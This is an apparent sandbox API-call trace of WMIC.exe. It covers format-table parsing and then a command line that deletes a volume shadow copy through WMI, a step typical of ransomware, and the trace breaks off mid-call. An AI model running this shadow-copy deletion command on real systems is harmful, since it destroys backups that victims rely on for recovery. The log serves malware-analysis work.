[0111.745] malloc (_Size=0x30) returned 0x4581c0 [0111.745] malloc (_Size=0x18) returned 0x45c6a0 [0111.745] free (_Block=0x45c6a0) [0111.745] malloc (_Size=0x18) returned 0x45c6a0 [0111.745] malloc (_Size=0x18) returned 0x45c6c0 [0111.745] SysStringLen (param_1="XML") returned 0x3 [0111.745] SysStringLen (param_1="TABLE") returned 0x5 [0111.746] SysStringLen (param_1="XML") returned 0x3 [0111.746] SysStringLen (param_1="VALUE") returned 0x5 [0111.746] SysStringLen (param_1="VALUE") returned 0x5 [0111.746] SysStringLen (param_1="XML") returned 0x3 [0111.746] malloc (_Size=0x30) returned 0x458200 [0111.746] malloc (_Size=0x18) returned 0x45c6e0 [0111.746] free (_Block=0x45c6e0) [0111.746] malloc (_Size=0x18) returned 0x45c6e0 [0111.746] malloc (_Size=0x18) returned 0x45c700 [0111.746] SysStringLen (param_1="MOF") returned 0x3 [0111.746] SysStringLen (param_1="TABLE") returned 0x5 [0111.746] SysStringLen (param_1="MOF") returned 0x3 [0111.746] SysStringLen (param_1="LIST") returned 0x4 [0111.746] SysStringLen (param_1="MOF") returned 0x3 [0111.746] SysStringLen (param_1="RAWXML") returned 0x6 [0111.746] SysStringLen (param_1="LIST") returned 0x4 [0111.746] SysStringLen (param_1="MOF") returned 0x3 [0111.746] malloc (_Size=0x30) returned 0x458240 [0111.747] malloc (_Size=0x18) returned 0x45c720 [0111.747] free (_Block=0x45c720) [0111.747] malloc (_Size=0x18) returned 0x45c720 [0111.747] malloc (_Size=0x18) returned 0x45c740 [0111.747] SysStringLen (param_1="CSV") returned 0x3 [0111.747] SysStringLen (param_1="TABLE") returned 0x5 [0111.747] SysStringLen (param_1="CSV") returned 0x3 [0111.747] SysStringLen (param_1="LIST") returned 0x4 [0111.747] SysStringLen (param_1="CSV") returned 0x3 [0111.747] SysStringLen (param_1="HTABLE") returned 0x6 [0111.747] SysStringLen (param_1="CSV") returned 0x3 [0111.747] SysStringLen (param_1="HFORM") returned 0x5 [0111.747] malloc (_Size=0x30) returned 0x458280 [0111.747] malloc (_Size=0x18) returned 0x45c760 [0111.747] free (_Block=0x45c760) [0111.747] malloc (_Size=0x18) returned 0x45c760 [0111.747] malloc (_Size=0x18) returned 0x45c780 [0111.747] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.748] SysStringLen (param_1="TABLE") returned 0x5 [0111.748] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.748] SysStringLen (param_1="VALUE") returned 0x5 [0111.748] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.748] SysStringLen (param_1="XML") returned 0x3 [0111.748] SysStringLen (param_1="XML") returned 0x3 [0111.748] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.748] malloc (_Size=0x30) returned 0x4582c0 [0111.748] malloc (_Size=0x18) returned 0x45c7a0 [0111.748] free (_Block=0x45c7a0) [0111.748] malloc (_Size=0x18) returned 0x45c7a0 [0111.748] malloc (_Size=0x18) returned 0x45c7c0 [0111.748] SysStringLen (param_1="texttablewsys") returned 0xd [0111.748] SysStringLen (param_1="TABLE") returned 0x5 [0111.748] SysStringLen (param_1="texttablewsys") returned 0xd [0111.748] SysStringLen (param_1="XML") returned 0x3 [0111.748] SysStringLen (param_1="texttablewsys") returned 0xd [0111.748] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.748] SysStringLen (param_1="XML") returned 0x3 [0111.748] SysStringLen (param_1="texttablewsys") returned 0xd [0111.748] malloc (_Size=0x30) returned 0x458300 [0111.749] malloc (_Size=0x18) returned 0x45c7e0 [0111.749] free (_Block=0x45c7e0) [0111.749] malloc (_Size=0x18) returned 0x45c7e0 [0111.749] malloc (_Size=0x18) returned 0x45c800 [0111.749] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.749] SysStringLen (param_1="TABLE") returned 0x5 [0111.749] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.749] SysStringLen (param_1="XML") returned 0x3 [0111.749] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.749] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.749] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.749] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.749] malloc (_Size=0x30) returned 0x458340 [0111.749] malloc (_Size=0x18) returned 0x45c820 [0111.749] free (_Block=0x45c820) [0111.749] malloc (_Size=0x18) returned 0x45c820 [0111.750] malloc (_Size=0x18) returned 0x45c840 [0111.750] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0111.750] SysStringLen (param_1="TABLE") returned 0x5 [0111.750] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0111.750] SysStringLen (param_1="XML") returned 0x3 [0111.750] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0111.750] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.750] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0111.750] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.750] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.750] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0111.750] malloc (_Size=0x30) returned 0x458380 [0111.750] malloc (_Size=0x18) returned 0x45c860 [0111.750] free (_Block=0x45c860) [0111.750] malloc (_Size=0x18) returned 0x45c860 [0111.750] malloc (_Size=0x18) returned 0x45c880 [0111.750] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.750] SysStringLen (param_1="TABLE") returned 0x5 [0111.750] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.750] SysStringLen (param_1="XML") returned 0x3 [0111.750] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.750] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.751] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.751] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.751] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.751] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.751] malloc (_Size=0x30) returned 0x4583c0 [0111.751] malloc (_Size=0x18) returned 0x45c8a0 [0111.751] free (_Block=0x45c8a0) [0111.751] malloc (_Size=0x18) returned 0x45c8a0 [0111.751] malloc (_Size=0x18) returned 0x45c8c0 [0111.751] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0111.751] SysStringLen (param_1="TABLE") returned 0x5 [0111.751] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0111.751] SysStringLen (param_1="XML") returned 0x3 [0111.751] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0111.751] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.751] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0111.751] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.751] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0111.751] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.751] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.751] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0111.751] malloc (_Size=0x30) returned 0x458400 [0111.752] malloc (_Size=0x18) returned 0x45c8e0 [0111.752] free (_Block=0x45c8e0) [0111.752] malloc (_Size=0x18) returned 0x45c8e0 [0111.752] malloc (_Size=0x18) returned 0x45c900 [0111.752] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0111.752] SysStringLen (param_1="TABLE") returned 0x5 [0111.752] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0111.752] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.752] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0111.752] SysStringLen (param_1="XML") returned 0x3 [0111.752] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0111.752] SysStringLen (param_1="texttablewsys") returned 0xd [0111.752] SysStringLen (param_1="XML") returned 0x3 [0111.752] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0111.752] malloc (_Size=0x30) returned 0x458440 [0111.752] malloc (_Size=0x18) returned 0x45c920 [0111.753] free (_Block=0x45c920) [0111.753] malloc (_Size=0x18) returned 0x45c920 [0111.753] malloc (_Size=0x18) returned 0x45c940 [0111.753] SysStringLen (param_1="htable-sortby") returned 0xd [0111.753] SysStringLen (param_1="TABLE") returned 0x5 [0111.753] SysStringLen (param_1="htable-sortby") returned 0xd [0111.753] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.753] SysStringLen (param_1="htable-sortby") returned 0xd [0111.753] SysStringLen (param_1="XML") returned 0x3 [0111.753] SysStringLen (param_1="htable-sortby") returned 0xd [0111.753] SysStringLen (param_1="texttablewsys") returned 0xd [0111.753] SysStringLen (param_1="htable-sortby") returned 0xd [0111.753] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0111.753] SysStringLen (param_1="XML") returned 0x3 [0111.753] SysStringLen (param_1="htable-sortby") returned 0xd [0111.753] malloc (_Size=0x30) returned 0x458480 [0111.753] malloc (_Size=0x18) returned 0x45c960 [0111.753] free (_Block=0x45c960) [0111.754] malloc (_Size=0x18) returned 0x45c960 [0111.754] malloc (_Size=0x18) returned 0x45c980 [0111.754] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0111.754] SysStringLen (param_1="TABLE") returned 0x5 [0111.754] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0111.754] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.754] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0111.754] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.754] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0111.754] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0111.754] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.754] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0111.754] malloc (_Size=0x30) returned 0x4584c0 [0111.754] malloc (_Size=0x18) returned 0x45c9a0 [0111.754] free (_Block=0x45c9a0) [0111.754] malloc (_Size=0x18) returned 0x45c9a0 [0111.754] malloc (_Size=0x18) returned 0x45c9c0 [0111.754] SysStringLen (param_1="wmiclimofformat") returned 0xf [0111.754] SysStringLen (param_1="TABLE") returned 0x5 [0111.754] SysStringLen (param_1="wmiclimofformat") returned 0xf [0111.755] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.755] SysStringLen (param_1="wmiclimofformat") returned 0xf [0111.755] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.755] SysStringLen (param_1="wmiclimofformat") returned 0xf [0111.755] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0111.755] SysStringLen (param_1="wmiclimofformat") returned 0xf [0111.755] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0111.755] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.755] SysStringLen (param_1="wmiclimofformat") returned 0xf [0111.755] malloc (_Size=0x30) returned 0x458500 [0111.755] malloc (_Size=0x18) returned 0x45c9e0 [0111.755] free (_Block=0x45c9e0) [0111.755] malloc (_Size=0x18) returned 0x45c9e0 [0111.755] malloc (_Size=0x18) returned 0x45ca00 [0111.755] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0111.755] SysStringLen (param_1="TABLE") returned 0x5 [0111.755] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0111.755] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.755] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0111.755] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.755] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0111.755] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.755] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.756] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0111.756] malloc (_Size=0x30) returned 0x458540 [0111.756] malloc (_Size=0x18) returned 0x45ca20 [0111.756] free (_Block=0x45ca20) [0111.756] malloc (_Size=0x18) returned 0x45ca20 [0111.756] malloc (_Size=0x18) returned 0x45ca40 [0111.756] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0111.756] SysStringLen (param_1="TABLE") returned 0x5 [0111.756] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0111.756] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.756] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0111.756] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.756] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0111.756] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.756] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0111.756] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0111.756] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.756] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0111.756] malloc (_Size=0x30) returned 0x458580 [0111.757] FreeThreadedDOMDocument:IUnknown:Release (This=0x1bf71d0) returned 0x0 [0111.757] free (_Block=0x456e90) [0111.757] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete" [0111.757] malloc (_Size=0xe0) returned 0x45cd30 [0111.757] memcpy_s (in: _Destination=0x45cd30, _DestinationSize=0xde, _Source=0x1225be, _SourceSize=0xd0 | out: _Destination=0x45cd30) returned 0x0 [0111.757] malloc (_Size=0x18) returned 0x45ca60 [0111.757] malloc (_Size=0x18) returned 0x45ca80 [0111.757] malloc (_Size=0x18) returned 0x45caa0 [0111.757] malloc (_Size=0x18) returned 0x45cac0 [0111.757] malloc (_Size=0x80) returned 0x456e90 [0111.757] GetLocalTime (in: lpSystemTime=0xaf710 | out: lpSystemTime=0xaf710*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x37, wSecond=0x10, wMilliseconds=0x110)) [0111.757] _vsnwprintf (in: _Buffer=0x456e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xaf668 | out: _Buffer="09-04-2020T08:55:16") returned 19 [0111.757] lstrlenW (lpString=" shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete") returned 71 [0111.757] malloc (_Size=0x90) returned 0x4570a0 [0111.757] lstrlenW (lpString=" shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete") returned 71 [0111.757] lstrlenW (lpString=" shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete") returned 71 [0111.757] malloc (_Size=0x90) returned 0x45ce20 [0111.757] lstrlenW (lpString=" shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete") returned 71 [0111.757] lstrlenW (lpString=" shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete") returned 71 [0111.757] lstrlenW (lpString=" shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete") returned 71 [0111.758] malloc (_Size=0x16) returned 0x45cae0 [0111.758] lstrlenW (lpString="shadowcopy") returned 10 [0111.758] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0111.758] malloc (_Size=0x16) returned 0x45cb00 [0111.758] malloc (_Size=0x8) returned 0x457140 [0111.758] free (_Block=0x0) [0111.758] free (_Block=0x45cae0) [0111.758] lstrlenW (lpString=" shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete") returned 71 [0111.758] malloc (_Size=0xc) returned 0x45cae0 [0111.758] lstrlenW (lpString="where") returned 5 [0111.758] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0111.758] malloc (_Size=0xc) returned 0x45cb20 [0111.758] malloc (_Size=0x10) returned 0x45cb40 [0111.758] memmove_s (in: _Destination=0x45cb40, _DestinationSize=0x8, _Source=0x457140, _SourceSize=0x8 | out: _Destination=0x45cb40) returned 0x0 [0111.758] free (_Block=0x457140) [0111.758] free (_Block=0x0) [0111.758] free (_Block=0x45cae0) [0111.758] lstrlenW (lpString=" shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete") returned 71 [0111.758] malloc (_Size=0x5c) returned 0x45cec0 [0111.758] lstrlenW (lpString="\"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\"") returned 45 [0111.758] _wcsicmp (_String1="\"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\"", _String2="\"NULL\"") returned -5 [0111.758] lstrlenW (lpString="\"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\"") returned 45 [0111.758] lstrlenW (lpString="\"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\"") returned 45 [0111.758] malloc (_Size=0x5c) returned 0x45cf30 [0111.758] malloc (_Size=0x18) returned 0x45cae0 [0111.758] memmove_s (in: _Destination=0x45cae0, _DestinationSize=0x10, _Source=0x45cb40, _SourceSize=0x10 | out: _Destination=0x45cae0) returned 0x0 [0111.758] free (_Block=0x45cb40) [0111.758] free (_Block=0x0) [0111.758] free (_Block=0x45cec0) [0111.758] lstrlenW (lpString=" shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete") returned 71 [0111.758] malloc (_Size=0xe) returned 0x45cb40 [0111.758] lstrlenW (lpString="delete") returned 6 [0111.758] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0111.758] malloc (_Size=0xe) returned 0x45cb60 [0111.758] malloc (_Size=0x20) returned 0x45cec0 [0111.758] memmove_s (in: _Destination=0x45cec0, _DestinationSize=0x18, _Source=0x45cae0, _SourceSize=0x18 | out: _Destination=0x45cec0) returned 0x0 [0111.759] free (_Block=0x45cae0) [0111.759] free (_Block=0x0) [0111.759] free (_Block=0x45cb40) [0111.759] malloc (_Size=0x20) returned 0x45cef0 [0111.759] lstrlenW (lpString="QUIT") returned 4 [0111.759] lstrlenW (lpString="shadowcopy") returned 10 [0111.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0111.759] lstrlenW (lpString="EXIT") returned 4 [0111.759] lstrlenW (lpString="shadowcopy") returned 10 [0111.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0111.759] free (_Block=0x45cef0) [0111.759] WbemLocator:IUnknown:AddRef (This=0x1dd1390) returned 0x2 [0111.759] malloc (_Size=0x20) returned 0x45cef0 [0111.759] lstrlenW (lpString="/") returned 1 [0111.759] lstrlenW (lpString="shadowcopy") returned 10 [0111.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0111.759] lstrlenW (lpString="-") returned 1 [0111.759] lstrlenW (lpString="shadowcopy") returned 10 [0111.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0111.759] lstrlenW (lpString="CLASS") returned 5 [0111.759] lstrlenW (lpString="shadowcopy") returned 10 [0111.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0111.759] lstrlenW (lpString="PATH") returned 4 [0111.759] lstrlenW (lpString="shadowcopy") returned 10 [0111.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0111.759] lstrlenW (lpString="CONTEXT") returned 7 [0111.759] lstrlenW (lpString="shadowcopy") returned 10 [0111.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0111.759] lstrlenW (lpString="shadowcopy") returned 10 [0111.759] malloc (_Size=0x16) returned 0x45cb40 [0111.759] lstrlenW (lpString="shadowcopy") returned 10 [0111.760] GetCurrentThreadId () returned 0xb08 [0111.760] ??0CHString@@QEAA@XZ () returned 0xaf520 [0111.760] malloc (_Size=0x18) returned 0x45cae0 [0111.760] malloc (_Size=0x18) returned 0x45cb80 [0111.760] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1dd1390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff522998 | out: ppNamespace=0xff522998*=0x1de3a98) returned 0x0 [0111.780] free (_Block=0x45cb80) [0111.780] free (_Block=0x45cae0) [0111.780] CoSetProxyBlanket (pProxy=0x1de3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0111.780] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0111.780] GetCurrentThreadId () returned 0xb08 [0111.780] ??0CHString@@QEAA@XZ () returned 0xaf3b8 [0111.780] malloc (_Size=0x18) returned 0x45cae0 [0111.780] malloc (_Size=0x18) returned 0x45cb80 [0111.780] malloc (_Size=0x18) returned 0x45cba0 [0111.780] malloc (_Size=0x18) returned 0x45cbc0 [0111.780] SysStringLen (param_1="root\\cli") returned 0x8 [0111.780] SysStringLen (param_1="\\") returned 0x1 [0111.780] malloc (_Size=0x18) returned 0x45cbe0 [0111.780] SysStringLen (param_1="root\\cli\\") returned 0x9 [0111.780] SysStringLen (param_1="ms_409") returned 0x6 [0111.781] free (_Block=0x45cbc0) [0111.781] free (_Block=0x45cba0) [0111.781] free (_Block=0x45cb80) [0111.781] free (_Block=0x45cae0) [0111.781] malloc (_Size=0x18) returned 0x45cae0 [0111.781] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1dd1390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff5229a0 | out: ppNamespace=0xff5229a0*=0x1de3b28) returned 0x0 [0111.786] free (_Block=0x45cae0) [0111.786] free (_Block=0x45cbe0) [0111.786] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0111.786] GetCurrentThreadId () returned 0xb08 [0111.786] ??0CHString@@QEAA@XZ () returned 0xaf530 [0111.786] malloc (_Size=0x18) returned 0x45cbe0 [0111.786] malloc (_Size=0x18) returned 0x45cae0 [0111.786] malloc (_Size=0x18) returned 0x45cb80 [0111.786] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0111.786] malloc (_Size=0x3a) returned 0x45cfa0 [0111.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff4b1980, cbMultiByte=-1, lpWideCharStr=0x45cfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0111.786] free (_Block=0x45cfa0) [0111.786] malloc (_Size=0x18) returned 0x45cba0 [0111.786] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0111.786] SysStringLen (param_1="shadowcopy") returned 0xa [0111.786] malloc (_Size=0x18) returned 0x45cbc0 [0111.786] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0111.786] SysStringLen (param_1="'") returned 0x1 [0111.786] free (_Block=0x45cba0) [0111.786] free (_Block=0x45cb80) [0111.786] free (_Block=0x45cae0) [0111.786] free (_Block=0x45cbe0) [0111.787] IWbemServices:GetObject (in: This=0x1de3a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0xaf538*=0x0, ppCallResult=0x0 | out: ppObject=0xaf538*=0x1df04e0, ppCallResult=0x0) returned 0x0 [0111.792] malloc (_Size=0x18) returned 0x45cbe0 [0111.792] IWbemClassObject:Get (in: This=0x1df04e0, wszName="Target", lFlags=0, pVal=0xaf460*(varType=0x0, wReserved1=0xff52, wReserved2=0x0, wReserved3=0x0, varVal1=0xff522998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf460*(varType=0x8, wReserved1=0xff52, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.792] free (_Block=0x45cbe0) [0111.792] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0111.793] malloc (_Size=0x3e) returned 0x45cfa0 [0111.793] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0111.793] malloc (_Size=0x18) returned 0x45cbe0 [0111.793] IWbemClassObject:Get (in: This=0x1df04e0, wszName="PWhere", lFlags=0, pVal=0xaf460*(varType=0x0, wReserved1=0xff52, wReserved2=0x0, wReserved3=0x0, varVal1=0x14e298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf460*(varType=0x8, wReserved1=0xff52, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.793] free (_Block=0x45cbe0) [0111.793] lstrlenW (lpString=" Where ID = '#'") returned 15 [0111.793] malloc (_Size=0x20) returned 0x45cff0 [0111.793] lstrlenW (lpString=" Where ID = '#'") returned 15 [0111.793] malloc (_Size=0x18) returned 0x45cbe0 [0111.793] IWbemClassObject:Get (in: This=0x1df04e0, wszName="Connection", lFlags=0, pVal=0xaf460*(varType=0x0, wReserved1=0xff52, wReserved2=0x0, wReserved3=0x0, varVal1=0x19bd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf460*(varType=0xd, wReserved1=0xff52, wReserved2=0x0, wReserved3=0x0, varVal1=0x1df09c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.793] free (_Block=0x45cbe0) [0111.793] IUnknown:QueryInterface (in: This=0x1df09c0, riid=0xff4b7360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xaf450 | out: ppvObject=0xaf450*=0x1df09c0) returned 0x0 [0111.793] GetCurrentThreadId () returned 0xb08 [0111.793] ??0CHString@@QEAA@XZ () returned 0xaf378 [0111.793] malloc (_Size=0x18) returned 0x45cbe0 [0111.793] IWbemClassObject:Get (in: This=0x1df09c0, wszName="Namespace", lFlags=0, pVal=0xaf3a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff4c738f, varVal2=0x45cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf3a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x45cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.793] free (_Block=0x45cbe0) [0111.793] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0111.793] malloc (_Size=0x16) returned 0x45cbe0 [0111.794] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0111.794] malloc (_Size=0x18) returned 0x45cae0 [0111.794] IWbemClassObject:Get (in: This=0x1df09c0, wszName="Locale", lFlags=0, pVal=0xaf3a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1ca658, varVal2=0x45cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf3a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x45cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.794] free (_Block=0x45cae0) [0111.794] lstrlenW (lpString="ms_409") returned 6 [0111.794] malloc (_Size=0xe) returned 0x45cae0 [0111.794] lstrlenW (lpString="ms_409") returned 6 [0111.794] malloc (_Size=0x18) returned 0x45cb80 [0111.794] IWbemClassObject:Get (in: This=0x1df09c0, wszName="User", lFlags=0, pVal=0xaf3a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1ca658, varVal2=0x45cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf3a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1ca658, varVal2=0x45cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.794] free (_Block=0x45cb80) [0111.794] malloc (_Size=0x18) returned 0x45cb80 [0111.794] IWbemClassObject:Get (in: This=0x1df09c0, wszName="Password", lFlags=0, pVal=0xaf3a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1ca658, varVal2=0x45cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf3a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1ca658, varVal2=0x45cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.794] free (_Block=0x45cb80) [0111.794] malloc (_Size=0x18) returned 0x45cb80 [0111.794] IWbemClassObject:Get (in: This=0x1df09c0, wszName="Server", lFlags=0, pVal=0xaf3a0*(varType=0x1, wReserved1=0x0, 